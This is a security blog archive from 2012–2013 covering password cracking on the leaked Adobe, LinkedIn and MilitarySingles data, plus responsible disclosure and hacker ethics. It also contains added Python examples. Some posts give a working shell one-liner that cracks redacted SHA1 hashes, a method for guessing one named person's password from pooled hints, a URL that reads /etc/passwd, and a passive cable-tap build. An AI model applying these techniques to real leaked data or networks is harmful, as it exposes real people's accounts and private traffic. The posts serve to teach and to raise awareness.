<b>7 Habits of Highly Effective Hackers</b><br />
Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLP<br />
<br />
<b>Can someone be targeted using the Adobe breach?</b> (2013-11-01)<br />
<span style="background-color: #9fc5e8;"><span style="color: blue;"><span style="font-size: xx-small;">Note: As a professional courtesy to those at Adobe who are doing their absolute best to mitigate this breach, I have partially redacted all full hashes and email addresses from this blog post, besides those found in the image published by arstechnica.com.</span></span></span><br />
<br />
We all know about the recent 153 Million account dump from Adobe. As arstechnica showed, the format looks something like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://cdn.arstechnica.net/wp-content/uploads/2013/11/adobe-passwords-copy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="http://cdn.arstechnica.net/wp-content/uploads/2013/11/adobe-passwords-copy.jpg" width="640" /></a></div>
<br />
<span style="font-size: x-small;">Image source: http://arstechnica.com/security/2013/11/how-an-epic-blunder-by-adobe-could-strengthen-hand-of-password-crackers/</span><br />
<br />
As you can see, there's some sort of ID number, the email address, the encrypted password (which, from the arstechnica article, we now know is 3DES) and the password hint.<br />
<br />
Password hints are great and all, but they can be unreliable, unclear, or flat out wrong.<br />
HOWEVER, when you have thousands of people using the same password (and therefore the same encrypted string), looking at all of their password hints together can make the cleartext password painfully obvious.<br />
For example, let's get the most common encrypted password strings from the dump (the number on the left is how many accounts used each one):<br />
<br />
1911867 EQ7fIp*****=<br />
446144 j9p+********************==<br />
345833 L8qbAD**********CatHBw==<br />
211659 BB4e6X+b*************w==<br />
201569 j9p*****2ws=<br />
124248 dQ*****PYvQ=<br />
113880 7*****Veq8I=<br />
83409 PMDTbP**********FUvYGA==<br />
<br />
<br />
Now let's take that first, most common password string, and collect the hints of every user who used that same password. Let's also uniq those and sort them by how popular each hint is:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/JYgeI44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="496" src="http://i.imgur.com/JYgeI44.jpg" width="640" /></a></div>
<br />
<br />
One can reasonably guess what password corresponds to EQ7fIp******=<br />
<br />
Now let's see what else we can do with this. Let's use this same method to see if we can target an individual account in the Adobe dump. Funnily enough, there's an entry for an account edwardsnowden@******mail.com.<br />
6**58***-|--|-edwardsnowden@******mail.com-|-B***************CatHBw==-|-|--<br />
<br />
<br />
Now let's see if any other people in the dump have the exact same password hash as this account, and if so then how many.<br />
[jdustin@localhost passwords]$ grep B***************CatHBw== cred | wc -l<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/KvrgODf.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="http://i.imgur.com/KvrgODf.jpg" width="640" /></a></div>
<br />
<br />
Okay, let's grab those 207 lines (every account that used that same password), cut out just their password hints, and then sort them by how often each hint appears in the list:<br />
[jdustin@localhost passwords]$ grep B***************CatHBw== cred | cut -d"|" -f5 | sort | uniq -c | sort -nr | head -n50<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/nmFhR49.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="530" src="http://i.imgur.com/nmFhR49.jpg" width="640" /></a></div>
<br />
<br />
So, Metal? 74W on the table of elements? The usual Tung?<br />
"tungsten" perhaps? Your guess is as good as mine. :)<br />
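The same grouping the grep/cut/sort/uniq pipeline above performs, written out as an added Python example (it is not code from the post). It parses the record layout shown above (id-|-uid-|-email-|-encrypted password-|-hint|--), groups accounts by their encrypted-password string, and tallies the hints for each group. It also adds the defender's view of the question in the title: for one given address, how many other accounts share its ciphertext and what their hints give away. Because the dump's encryption is deterministic (no per-user salt), identical passwords map to identical strings, which is the whole reason the hints can be pooled. The records, addresses, ciphertexts and hints below are constructed for the demo.<br />

```python
from collections import Counter, defaultdict

# Constructed sample records in the Adobe dump layout described above:
#   id-|-uid-|-email-|-encrypted password-|-hint|--
# Every id, address, ciphertext and hint here is made up for illustration.
SAMPLE_DUMP = """\
100001-|--|-alice@example.invalid-|-AAAAexampleAAA==-|-usual number|--
100002-|--|-bob@example.invalid-|-AAAAexampleAAA==-|-123456|--
100003-|--|-carol@example.invalid-|-AAAAexampleAAA==-|-1 to 6|--
100004-|--|-dave@example.invalid-|-AAAAexampleAAA==-|-usual number|--
100005-|--|-erin@example.invalid-|-BBBBexampleBBB==-|-|--
100006-|--|-frank@example.invalid-|-BBBBexampleBBB==-|-dog name|--
100007-|--|-grace@example.invalid-|-CCCCexampleCCC==-|-|--
"""


def parse_record(line):
    """Return (id, uid, email, ciphertext, hint), or None for a malformed line."""
    line = line.rstrip("\r\n")
    if not line.endswith("|--"):
        return None
    fields = line[:-3].split("-|-")   # the hint field is closed by the "|--" terminator
    if len(fields) != 5:
        return None
    return tuple(fields)


def index_by_ciphertext(text):
    """Map each encrypted-password string to the list of hints its users supplied."""
    hints = defaultdict(list)
    for line in text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        _, _, _, cipher, hint = rec
        hints[cipher].append(hint)
    return hints


def most_common_ciphertexts(hints, n=10):
    """Equivalent of `cut ... | sort | uniq -c | sort -nr | head` on the password field."""
    return Counter({c: len(h) for c, h in hints.items()}).most_common(n)


def hints_for(hints, cipher, n=50):
    """Non-empty hints for one ciphertext, most frequent first (ties broken alphabetically)."""
    counts = Counter(h for h in hints.get(cipher, []) if h)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))[:n]


def exposure_for_account(hints, text, email):
    """Defender's view: for one address, its ciphertext, how many OTHER accounts share it,
    and what those accounts' hints say. Returns None if the address is not in the dump."""
    for line in text.splitlines():
        rec = parse_record(line)
        if rec and rec[2] == email:
            cipher = rec[3]
            return cipher, len(hints[cipher]) - 1, hints_for(hints, cipher)
    return None


if __name__ == "__main__":
    idx = index_by_ciphertext(SAMPLE_DUMP)
    for cipher, count in most_common_ciphertexts(idx):
        print(f"{count:8d} {cipher}")
    print(exposure_for_account(idx, SAMPLE_DUMP, "erin@example.invalid"))
```

On the constructed data the top group is AAAAexampleAAA== with four accounts, and erin's account (empty hint) is exposed by one other account whose hint is "dog name"; a blank hint on your own account does not help if someone else with the same password wrote a useful one.<br />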
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/8cO2OSJ.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://i.imgur.com/8cO2OSJ.jpg" width="320" /></a></div>
<br />
<br />
<b>Being a good internet citizen</b> (2013-04-23)<br />
A large percentage of breaches are discovered when a third party mentions to you that you're insecure. I would estimate it to be well over 50%.<br />
Because of that, when I come across things that are vulnerable I typically try to let the company know so they can fix it. Most of these are simple things that are indexed by google that were not meant to be public (see <a href="http://7habitsofhighlyeffectivehackers.blogspot.com/2012/04/let-google-be-your-guide.html">this post</a> on google hacking).<br />
<br />
I sometimes get responses, but typically do not. The most common response is a simple thank you email. I've had less nice responses as well, such as people angrily demanding to know what my intentions were. No good deed goes unpunished.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ySmbXxF.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/ySmbXxF.gif" /></a></div>
<br />
<br />
Recently I sent an email to a company to let them know they had a misconfiguration that makes every file on their box viewable (with the permissions of the httpd user) by the entire world. It looked kind of like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVmm6Gsheo0VxiqmqUgEj1vW8QrFoWBrFd_g-CWZ7nVlb76iGaUXyn0IG3D-vgPjiyXWFL5MaosjQxsayRUQ_0KeF_T-ZwD5PquknJW2y8vzG7rxT42F3PdeHiYBLUU8rJAUJt6jqz_Vg/s1600/ouch.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVmm6Gsheo0VxiqmqUgEj1vW8QrFoWBrFd_g-CWZ7nVlb76iGaUXyn0IG3D-vgPjiyXWFL5MaosjQxsayRUQ_0KeF_T-ZwD5PquknJW2y8vzG7rxT42F3PdeHiYBLUU8rJAUJt6jqz_Vg/s320/ouch.jpg" width="320" /></a></div>
<br />
<br />
Plus, everything on their box had been indexed by google. Imagine your backups and config files being freely downloadable and searchable on google!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ASqr6cd.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="http://i.imgur.com/ASqr6cd.gif" width="320" /></a></div>
<br />
<span style="font-size: large;">Even worse, there wasn't just one domain hosted on this vulnerable box...a reverse lookup of the IP showed that the server was hosting <b>576 domains!</b></span><br />
<br />
<br />
So I sent them a simple email:<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">Attention Information Security,<br />I saw this site on google, and
happened to notice that you appear to have a sym link in your document
root that points back to / allowing access to your entire system through
the webserver.<br />
For example, your passwd file SHOULD NOT be publicly viewable.<br /><a href="http://xxxxxxxxx.com/eth/1.txt/etc/passwd" target="_blank">http://XXXXXXXXX.com/<span style="font-size: x-small;">x.txt</span>/etc/passwd</a><br /><br />Please let me know if you have any questions.<br />
Thank you,</span></blockquote>
<br />
I received a response from them, which included this:<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">It's worth noting that /etc/passwd does not contain any sensitive
information, and that although we do not widely publish our
configuration, we do not generally consider it to be sensitive as
it is relatively trivial to reverse-engineer by experimentation
and observation. We conduct regular reviews of our platform's
security and take extensive measures to ensure that our servers
stay secure. </span></blockquote>
<br />
Huh. Okay.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/2sVtQ.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://i.imgur.com/2sVtQ.gif" width="320" /></a></div>
<br />
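A check that would have caught the misconfiguration described above (a symlink inside the document root that resolves to /), as an added Python example rather than anything from the post or from the hosting company. It walks a document root without following links, resolves every symlink it finds, and reports the ones whose real target lies outside the root. The demo() fixture builds a throwaway docroot in a temporary directory with one harmless link and one that escapes; the fixture is constructed, and the check assumes a POSIX filesystem where os.symlink works.<br />

```python
import os
import shutil
import tempfile


def is_inside(root, path):
    """True when path, after resolving symlinks and '..', still lies within root."""
    root = os.path.realpath(root)
    return os.path.commonpath([root, os.path.realpath(path)]) == root


def escaping_links(docroot):
    """Return (link path, resolved target) for every symlink under docroot whose
    resolved target is outside docroot. The walk itself never follows links, so a
    link to / cannot drag the scan across the whole filesystem."""
    root = os.path.realpath(docroot)
    found = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:        # symlinks to dirs show up in dirnames
            path = os.path.join(dirpath, name)
            if os.path.islink(path) and not is_inside(root, path):
                found.append((path, os.path.realpath(path)))
    return found


def demo():
    """Constructed fixture: a docroot with one safe link and one that points at /.
    Returns the basenames of the links the check flags."""
    base = tempfile.mkdtemp()
    try:
        docroot = os.path.join(base, "htdocs")
        os.makedirs(os.path.join(docroot, "img"))
        open(os.path.join(docroot, "index.html"), "w").close()
        os.symlink(os.path.join(docroot, "img"), os.path.join(docroot, "images"))  # stays inside
        os.symlink("/", os.path.join(docroot, "x.txt"))  # the "x.txt -> /" case from the email
        return sorted(os.path.basename(p) for p, _ in escaping_links(docroot))
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print(demo())   # ['x.txt']
```

Run against a real docroot with escaping_links("/var/www/html") (path assumed); anything it returns is reachable through the web server with the httpd user's permissions, which is exactly the exposure above. Disabling FollowSymLinks (or using SymLinksIfOwnerMatch) in the web server config closes the same hole from the other side.<br />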
<span style="font-size: xx-small;">Note: Names have been redacted to protect the ignorant.</span><br />
<br />
<b>Untitled post</b> (2013-04-19)<br />
All, I noticed a tweet by <a href="https://twitter.com/hdmoore">HD Moore</a> today giving a shout out to this post written last week by <a href="https://twitter.com/edskoudis">Ed Skoudis</a>. Very good read. Here's a link and an excerpt:<br />
<br />
http://pen-testing.sans.org/blog/pen-testing/2013/04/08/when-offense-and-defense-become-one<br />
<br />
"at sufficiently advanced technical levels, offense and
defense sometimes merge and become one. Offensive techniques can be
used to achieve defensive ends; defensive means can be used to achieve
offensive ends; and, sometimes, the inherent technical skills of offense
and defense are actually identical."<br />
<br /> <br />
"Consider these examples:<br />
<ul>
<li><em>Endpoint security suites:</em> Have you ever
pondered what these tools really are? With their integrated anti-virus,
personal firewall, and host-based Intrusion Prevention Systems, they
operate at a fairly low-level of most operating systems, hooking all
kinds of system calls so that administrators can maintain control of the
machine. Wait... that's a rootkit! The only difference between an
endpoint security suite and most rootkits is the level of functionality
and who controls it: good guy administrators or bad guys. So, we've got a
multi-billion dollar segment of the infosec industry that is actually
built on selling commercial rootkits, also known as endpoint security
suites."</li>
</ul>
Ed Skoudis is a very dynamic teacher there at SANS, and I recommend his courses to everyone. <br />
<br />
<b>Habit 1</b> (2013-01-31)<br />
I gave a presentation at a conference last year, and someone commented that if I have a blog called "the 7 habits of highly effective hackers", I should probably have a list of 7 actual habits on said blog. I guess that's fair.<br />
<br />
So here we go starting with habit 1, which I promise will be the only non-technical habit of the 7.<br />
<br />
<b>Habit 1: Effective hackers know that the game they play IS the real world.</b><br />
In a sentence; <u>Effective Hackers understand the repercussions of their actions.</u><br />
There's something about computer systems that causes many people to act in a way that they never would in real life. Some of us would never read a stranger's physical mail, yet would feel no guilt whatsoever about reading their email. We make silly excuses to justify why our online world is different than our real world. That person should have changed the default password on their router; they're stupid and deserve it. That company knows their environment/product is insecure, if they wanted to keep me out they'd have fixed it.<br />
<br />
Think this one over. Although there's no CVE number for it yet, it is now being reported that human beings are vulnerable to having bricks thrown at their heads. All versions are affected, and easy methods for exploiting this weakness have reportedly been in the wild for some time now... Would anyone think that the public disclosure of this knowledge would in any way justify them throwing bricks and hurting others? Are we more justified because they should have known better?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLyvU-uC5kJCNUuQhF8gZ_6IDXt_VllfaH09qGgIG4poLNI4rtk6bq-UP8p8TVnFBRmTBgh5nO4EEKB4p3bMh5J2v05cxONARYTbFVfjAFyJvj104pV_cg2UvD831f6OoMNDir9Cbnets/s1600/brick.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLyvU-uC5kJCNUuQhF8gZ_6IDXt_VllfaH09qGgIG4poLNI4rtk6bq-UP8p8TVnFBRmTBgh5nO4EEKB4p3bMh5J2v05cxONARYTbFVfjAFyJvj104pV_cg2UvD831f6OoMNDir9Cbnets/s320/brick.jpg" width="320" /></a></div>
<br />
This probably all sounds really preachy. I'm actually not trying to tell you that you should feel guilt for hurting others (that's between you and your own conscience). I AM trying to say you should <u>understand</u> the repercussions of your actions. If you post someone's PII on pastebin, someone, A REAL PERSON, will experience real grief over it. When you gain access to someone's network, it could mean real impact for that organization. Real people could lose their jobs over it. I'm not telling you to care, I'm telling you that you MUST understand.<br />
You must do whatever you do with your eyes wide open. Know and accept all possible impacts of every scan, every exploit, every move.<br />
<br />
Okay, gotta go. My shirt just got out of the dryer. I'm sure we're all familiar with MITM (Mythbuster In The Middle).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBsruaCGl_PxVhuvf511FQp1bBwrdJ91jxOW7S2oBDgYpMoH7aXZ_5B7Lc_Gw6CsACut82POyf0prKCQxbx9NmMWKrGAUfroumb1tW7u5ra8HCrYQgQ63ZcWhp1_pDABV-Zpdw4iECj0o/s1600/photo.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBsruaCGl_PxVhuvf511FQp1bBwrdJ91jxOW7S2oBDgYpMoH7aXZ_5B7Lc_Gw6CsACut82POyf0prKCQxbx9NmMWKrGAUfroumb1tW7u5ra8HCrYQgQ63ZcWhp1_pDABV-Zpdw4iECj0o/s320/photo.JPG" width="320" /></a></div>
<br />
<br />
<b>Thanks, and UtahSAINT Conference 2012</b> (2012-08-22)<br />
First off, I'd like to thank all those who have built on my proof of concept, <a href="http://7habitsofhighlyeffectivehackers.blogspot.com/2012/05/using-twitter-to-build-password.html">Using twitter to build password cracking wordlist.</a> Some of you have seriously taken it to the next level, and I applaud your efforts.<br /><br />Including, but not limited to:<br /><a href="http://www.digininja.org/projects/twofi.php">http://www.digininja.org/projects/twofi.php</a><br /><a href="http://blog.hacktalk.net/twitscrape/">http://blog.hacktalk.net/twitscrape/</a><br /><a href="http://www.damnsecure.org/?p=833">http://www.damnsecure.org/?p=833</a><br /><a href="http://www.nathanv.com/2012/07/18/shell-script-use-twiter-and-bing-to-generate-wordlists/">http://www.nathanv.com/2012/07/18/shell-script-use-twiter-and-bing-to-generate-wordlists/</a><br />Nicely done, effective hackers.<br /><br />Now on to the main reason for this post.<br />I'll be presenting at the UtahSAINT Conference 2012, this upcoming Oct 9-12 in Saint George UT.<br />My topic will be "The 7 Habits of Highly Effective Hackers: Effective hacking techniques and countermeasures."<br />
<br />Other speakers include:<br /><span style="color: #274e13;">Kevin Young</span>- whose unique passphrase cracking techniques helped his team take 2nd place at this year's "crack me if you can" contest at Defcon<br /><span style="color: #274e13;">Miles Johnson</span>- Security Analyst at Utah State University (and my old mentor)<br /><span style="color: #274e13;">Special Agent Cheny Engtow</span>- of the FBI<br />
And many more...<br /><br />If you're attending the conference or just in the area, swing by and say hello.<br />
Until next time... <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWIq3Stj-B1G1IZdegAtpMoy7yvLLw7M5kw_3W2wpDB_rE6VBLTDtBjpPsScTVWdtQ7ZObAfoLUUVEeWH4PzpXb6Z6LZH8AwK_6QUOgTbSqLOkZzVjToflOwHMP19cLLmZi9zjolsXCnc/s1600/99problems1a.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWIq3Stj-B1G1IZdegAtpMoy7yvLLw7M5kw_3W2wpDB_rE6VBLTDtBjpPsScTVWdtQ7ZObAfoLUUVEeWH4PzpXb6Z6LZH8AwK_6QUOgTbSqLOkZzVjToflOwHMP19cLLmZi9zjolsXCnc/s640/99problems1a.png" width="640" /></a></div>
<br />
<b>Passively Cable Tapping Cat5</b> (2012-08-15)<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqYfqP0RgrsYw2cGc1LpZ0SOyQahVHiTgaitHEpOdEEJdGUfvL50FYntEXeJBCh9LVENGW9jADaVCNxF8SHOB0GzR8iSi4BEGHnmq6-AsHGJg2Wa1tJ1PcbMbv9Q3I8hPM0tjwHa2DVFc/s1600/wiretap1.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqYfqP0RgrsYw2cGc1LpZ0SOyQahVHiTgaitHEpOdEEJdGUfvL50FYntEXeJBCh9LVENGW9jADaVCNxF8SHOB0GzR8iSi4BEGHnmq6-AsHGJg2Wa1tJ1PcbMbv9Q3I8hPM0tjwHa2DVFc/s400/wiretap1.jpg" width="225" /></a>When someone shows off a novel idea/solution they came up with, there are typically about a thousand people who rush in to say "You should have done it this way instead." Then others who attempt to build on the idea, and make it easier and even cooler. In this post I will attempt the latter.<br />
<br />
In the most recent edition of <a href="http://www.2600.com/">2600, The Hacker Quarterly,</a> there was a story entitled "BUILDING A CAT-5 CABLE TAP" that details how to create a passive hardware cable tap using alligator clips. I love seeing stuff like this. The author came up with this idea, made it work, and posted it for all to share.<br />
<br />
This past spring while in a server room with a friend/co-worker, we noticed a cable that ran through our cage that belonged to a different group within our company. We joked about cutting it, attaching a RJ45 end to each side, and sticking a hub on it. The conversation progressed to methods for doing this passively, without having to cut the wire. Soon we came to the same idea as the author, and decided we could use alligator clips.<br />
<br />
Later on that week I was online reading about wall jacks and decided to give this a try. I picked up a cat5 end for 1.40 at home depot. I stripped a small length of the cat5 outer shielding, and punched the wires down into the wall jack. Make sure you use a tool bit that doesn't cut the wire on one side.<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh00YXNfEMkaBn3hg2qkCkFC8r9bDZfd2vI5Add1jpe4PMUzt9b59-8PKzkAkoNLnAohHNufLg2qMaXRHOz7MF4oOxJK3QfmK2zDNu7tNw7hAUssH38aTwR0t23hDMi6Jsl8CUs4T1Q7mk/s1600/wiretap2.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh00YXNfEMkaBn3hg2qkCkFC8r9bDZfd2vI5Add1jpe4PMUzt9b59-8PKzkAkoNLnAohHNufLg2qMaXRHOz7MF4oOxJK3QfmK2zDNu7tNw7hAUssH38aTwR0t23hDMi6Jsl8CUs4T1Q7mk/s640/wiretap2.jpg" width="640" /></a><br />
<br />
<br />
<br />
<br />
This worked great. The target machine didn't even drop a packet. Basically the exact same thing as using alligator clips, but much less stripping.<br />
<br />
My hat is off to the author of the article. I hope you don't mind me expanding a little on your idea.<br />
<br />
<b>Cracking the 3.5 Million Password Hashes That Were Redacted</b> (2012-06-06)<br />
The release of millions of SHA1 hashes from linkedin.com has the internet all buzzing today... but then comes the news that 3.5 million of them have the first 5 characters redacted and replaced with 00000.<br />
Well, if we don't have the entire hash we can't crack them... Oh wait, we still have the remaining 36 characters to do a comparison against.<br />
So let's try this:<br />
First, let's get just the hashes that start with the 00000. Looks like there are 3,521,180.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_6-w6Kn-2sTsYs6I3CQxe2NUoGMJjT_PLjwOP1kBLDLjoYNW-jnRGYRSNwC7SlKFphdYWmta8-2bLikIK4NLty4Z8iSPGGSeEA7ZiUdjajTRcRAXp5ljv3V_SA2acB4DidxHDavgWfa4/s1600/0003.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_6-w6Kn-2sTsYs6I3CQxe2NUoGMJjT_PLjwOP1kBLDLjoYNW-jnRGYRSNwC7SlKFphdYWmta8-2bLikIK4NLty4Z8iSPGGSeEA7ZiUdjajTRcRAXp5ljv3V_SA2acB4DidxHDavgWfa4/s640/0003.png" width="640" /></a></div>
<br />
<br />
Now, for each line in our word list (WORDS.txt) let's calculate the SHA1 hash, chop off the first 5 characters, and compare the rest to our hash list. If the partial hash is there, echo the password to the screen.<br />
For those that can't see that, the command is:<br />
for i in `cat WORDS.txt` ; do grep -q `echo -n $i | sha1sum | cut -b6-41` SHA1-0s.txt && echo $i ; done <br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuSNu8tfxWLc-pBqUGOhQtg3nti-7XSDOy2NMCB8-opwpQeE9cqGmQiYyk6Z2EyzFRny8LAnwbs9q_e2a8gwlsFEKKZi6T9Glxf1QOx8e1bdqgyGaiU5z0xD_upeTo5jrbdGCuKtuad-g/s1600/0002.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuSNu8tfxWLc-pBqUGOhQtg3nti-7XSDOy2NMCB8-opwpQeE9cqGmQiYyk6Z2EyzFRny8LAnwbs9q_e2a8gwlsFEKKZi6T9Glxf1QOx8e1bdqgyGaiU5z0xD_upeTo5jrbdGCuKtuad-g/s640/0002.png" width="640" /></a><br />
<br />
And boom, there are thousands of passwords scrolling down the screen.<br />
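The comparison the one-liner above performs, as an added Python example (not the post's command): instead of running grep over the whole 3.5 million-line file once per word, it indexes the hex digits that follow the 00000 prefix of every redacted hash in a set, then does one SHA-1 and one set lookup per candidate word. SHA1-0s.txt is not available offline, so SAMPLE_HASHES is a constructed list in the same redacted layout (built from known words so the demo checks itself), and WORDLIST stands in for WORDS.txt.<br />

```python
import hashlib

HEX = set("0123456789abcdef")


def redact(word):
    """Produce a hash in the redacted LinkedIn layout: SHA-1 with the first five
    hex digits replaced by 00000 (used only to build the constructed sample below)."""
    return "00000" + hashlib.sha1(word.encode()).hexdigest()[5:]


# Constructed stand-in for SHA1-0s.txt: three hashes of known words plus one that
# matches nothing in the wordlist.
SAMPLE_HASHES = [redact(w) for w in ("linkedin", "password1", "sunshine")] + [
    "00000" + "f" * 35,
]
# Constructed stand-in for WORDS.txt.
WORDLIST = ["letmein", "linkedin", "sunshine", "qwerty", "password1", "Password1"]


def load_suffixes(lines):
    """Index the 35 hex digits after the redacted prefix of each hash.
    Lines that are not 40 lowercase/uppercase hex characters are skipped."""
    suffixes = set()
    for line in lines:
        h = line.strip().lower()
        if len(h) == 40 and set(h) <= HEX:
            suffixes.add(h[5:])
    return suffixes


def match_words(words, suffixes):
    """Words whose SHA-1, minus its first five hex digits, is in the index.
    This is the `sha1sum | cut -b6-` comparison, done once per word against a set."""
    hits = []
    for w in words:
        if hashlib.sha1(w.encode()).hexdigest()[5:] in suffixes:
            hits.append(w)
    return hits


if __name__ == "__main__":
    # Real use: load_suffixes(open("SHA1-0s.txt")) and words from open("WORDS.txt").
    for w in match_words(WORDLIST, load_suffixes(SAMPLE_HASHES)):
        print(w)
```

Dropping five hex digits removes 20 bits of the 160-bit digest, so a spurious match on the remaining 140 bits is not a practical concern; redacting the prefix hides which hash was cracked from a casual reader but does nothing to stop the comparison.<br />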
Enjoy.<br />
<br />
<b>Using twitter to build password cracking wordlist</b> (2012-05-31)<br />
This is going to be a quick one. We're going to show how to use twitter to build a word list for cracking passwords.<br />
We'll use John the Ripper, and as a target we'll use the MilitarySingles.com md5 password hashes that were released by the artist formerly known as lulzsec.<br />
<br />
First, let's hack out a quick script that will get relevant tweets for us. And yes, I use a lot of tabs. And I know I can do this cleaner... I'm in a get it done quick mood.<br />
<span style="font-size: x-small;">(EDIT: thanks to Supercow1127 and TheShadowFog for pointing out better ways to deal with JSON. See jshon, jsawk, etc).</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Ugw2EiFx07lI4YXN7g5G8LtNh9P-mApsJvkcdEoIAjHO0I_Tb1KVhlQf91T3Xouw0cmcknb2CwMNcSU7dwTMVp5_v9AAS_oVNX92HaXXFv93gisNeGJthg5Us61-KuubnYinsQl_5mk/s1600/john1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="409" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Ugw2EiFx07lI4YXN7g5G8LtNh9P-mApsJvkcdEoIAjHO0I_Tb1KVhlQf91T3Xouw0cmcknb2CwMNcSU7dwTMVp5_v9AAS_oVNX92HaXXFv93gisNeGJthg5Us61-KuubnYinsQl_5mk/s640/john1a.png" width="640" /></a></div>
The script will connect to twitter and get 500 tweets for the term supplied, then barf back all the words from those tweets in a list for us. Next we are going to pass the script some words that might be relevant to our target.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji-TKvlY_dJnWLsSXnAzpXAt4DvCzYJk50Lf9kCPqMvl86X9aXhkuixAfq_8Beu8LxXnusSC-eNKS1m4Q6GV1iTpkuFRPdPwlj49b5X-0TWqSXgucPzvDmC6vINJstL5-1dY7ODPI-w74/s1600/john2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji-TKvlY_dJnWLsSXnAzpXAt4DvCzYJk50Lf9kCPqMvl86X9aXhkuixAfq_8Beu8LxXnusSC-eNKS1m4Q6GV1iTpkuFRPdPwlj49b5X-0TWqSXgucPzvDmC6vINJstL5-1dY7ODPI-w74/s640/john2.png" width="640" /></a></div>
After we sort the list out, we're left with 4400 unique words. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl5FsmAkyanpHFttocJ86TiQkmU4jl6pVyr3Iyt70CD0BiXMclahyphenhyphencPNHO2tvSwjltf-Ax4_lDoB20oC-djtZtW1rJbUixU-iElUUQZnH98ebj4T9MGj1H5IIZ13soCgzeEMVtw3zX1HY/s1600/john3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl5FsmAkyanpHFttocJ86TiQkmU4jl6pVyr3Iyt70CD0BiXMclahyphenhyphencPNHO2tvSwjltf-Ax4_lDoB20oC-djtZtW1rJbUixU-iElUUQZnH98ebj4T9MGj1H5IIZ13soCgzeEMVtw3zX1HY/s640/john3.png" width="640" /></a></div>
Let's try those words against our hashes and see how many of them are used as passwords. We'll use the --rules option so that it mangles up various permutations of each word.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
